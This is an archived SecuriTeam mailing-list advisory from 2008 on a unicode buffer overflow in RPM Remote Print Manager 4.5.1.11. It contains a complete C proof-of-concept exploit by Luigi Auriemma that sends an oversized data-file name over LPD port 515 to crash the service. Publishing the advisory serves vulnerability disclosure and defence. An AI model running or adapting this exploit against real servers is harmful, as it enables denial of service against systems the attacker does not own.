Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Exploits-HackingTools
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[NT] RPM Remote Print Manager Unicode Buffer Overflow

from [SecuriTeam] Network Security [Permanent Link]
Subject: [NT] RPM Remote Print Manager Unicode Buffer Overflow
Date: 13 Feb 2008 14:04:39 +0200 
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  RPM Remote Print Manager Unicode Buffer Overflow
------------------------------------------------------------------------


SUMMARY

 <http://lpd.brooksnet.com> Remote Print Manager (RPM) is "a commercial 
LPD server for Windows". RPM is affected by an unicode buffer-overflow 
during the handling of the "data file" name used for the creation of the 
temporary file to print.

DETAILS

Vulnerable Systems:
 * RPM Remote Print Manager version 4.5.1.11

Exploit:
/*

by Luigi Auriemma - http://aluigi.org/poc/rpmlpdbof.zip

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define ONESEC  1000
    #define sleep   Sleep
    #define sleepms(x)  sleep(x)
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netdb.h>

    #define ONESEC  1
    #define sleepms(x)  usleep(x * 1000)
#endif

typedef uint8_t     u8;
typedef uint16_t    u16;
typedef uint32_t    u32;



#define VER     "0.1"
#define PORT    515
#define BUFFSZ  4096
#define BOFSZ   800



int lpd_sendrecv(int sd, u8 *msg, u8 *cmd, int cmdlen, u8 *data, int 
datalen);
int putss(u8 *data, u8 *str);
int timeout(int sock, int secs);
u32 resolv(char *host);
void std_err(void);



int main(int argc, char *argv[]) {
    struct  sockaddr_in peer;
    int     sd,
            len;
    u8      buff[BUFFSZ],
            cmd[BUFFSZ],
            fname[BUFFSZ],
            *p;

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    setbuf(stdout, NULL);

    fputs("\n"
        "RPM Remote Print Manager <= 4.5.1.11 unicode buffer-overflow 
"VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 2) {
        printf("\n"
            "Usage: %s <host>\n"
            "\n", argv[0]);
        exit(1);
    }

    peer.sin_addr.s_addr = resolv(argv[1]);
    peer.sin_port        = htons(PORT);
    peer.sin_family      = AF_INET;

    printf("- target   %s : %hu\n", inet_ntoa(peer.sin_addr), 
ntohs(peer.sin_port));

    sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if(sd < 0) std_err();
    if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))
     < 0) std_err();

    len = sprintf(cmd, "\x02" "queue\n");
    if(lpd_sendrecv(sd, "queue name", cmd, len, NULL, 0) < 0) goto quit;

    p = buff;
    p += putss(p, "J" "jobname\n");    // not needed
    len = sprintf(cmd, "\x02" "%d cfA001X\n", p - buff);
    if(lpd_sendrecv(sd, "control file", cmd, len, buff, p - buff) < 0) 
goto quit;

    memset(fname, 'a', BOFSZ);
    fname[BOFSZ] = 0;

    p = buff;
    p += putss(p, "content of the file");
    len = sprintf(cmd, "\x03" "%d dfA001X%s\n", p - buff, fname);
    if(lpd_sendrecv(sd, "malformed data file", cmd, len, buff, p - buff) < 
0) goto quit;

quit:
    close(sd);
    printf("- finished\n");
    return(0);
}



int lpd_sendrecv(int sd, u8 *msg, u8 *cmd, int cmdlen, u8 *data, int 
datalen) {
    u8      buff[BUFFSZ];

    printf("- send %s\n", msg);
    send(sd, cmd, cmdlen, 0);
    if(data) {
        send(sd, data, datalen, 0);
        send(sd, "", 1, 0);
    }
    if(timeout(sd, 5) < 0) return(-1);  // only a simple recv, no need to 
check data
    if(recv(sd, buff, BUFFSZ, 0) <= 0) return(-1);
    return(0);
}



int putss(u8 *data, u8 *str) {
    int     len;

    len = strlen(str);
    memcpy(data, str, len);
    return(len);
}



int timeout(int sock, int secs) {
    struct  timeval tout;
    fd_set  fd_read;

    tout.tv_sec  = secs;
    tout.tv_usec = 0;
    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    if(select(sock + 1, &fd_read, NULL, NULL, &tout)
      <= 0) return(-1);
    return(0);
}



u32 resolv(char *host) {
    struct  hostent *hp;
    u32     host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolve hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u32 *)(hp->h_addr);
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


ADDITIONAL INFORMATION

The information has been provided by  <mailto:aluigi@autistici.org> Luigi 
Auriemma.
The original article can be found at:  
<http://aluigi.altervista.org/adv/rpmlpdbof-adv.txt> 
http://aluigi.altervista.org/adv/rpmlpdbof-adv.txt



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages.
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [NT] RPM Remote Print Manager Unicode Buffer Overflow, SecuriTeam <=
Previous by Date:  [NT] Vulnerability in WebDAV Mini-Redirector Allows Code Execution (MS08-007), SecuriTeam
Next by Date:  [NT] Vulnerability in OLE Automation Allows Code Execution, SecuriTeam
Previous by Thread:  [NT] Vulnerability in WebDAV Mini-Redirector Allows Code Execution (MS08-007), SecuriTeam
Next by Thread:  [NT] Vulnerability in OLE Automation Allows Code Execution, SecuriTeam
Indexes:  [Date] [Thread] [Top] [All Lists]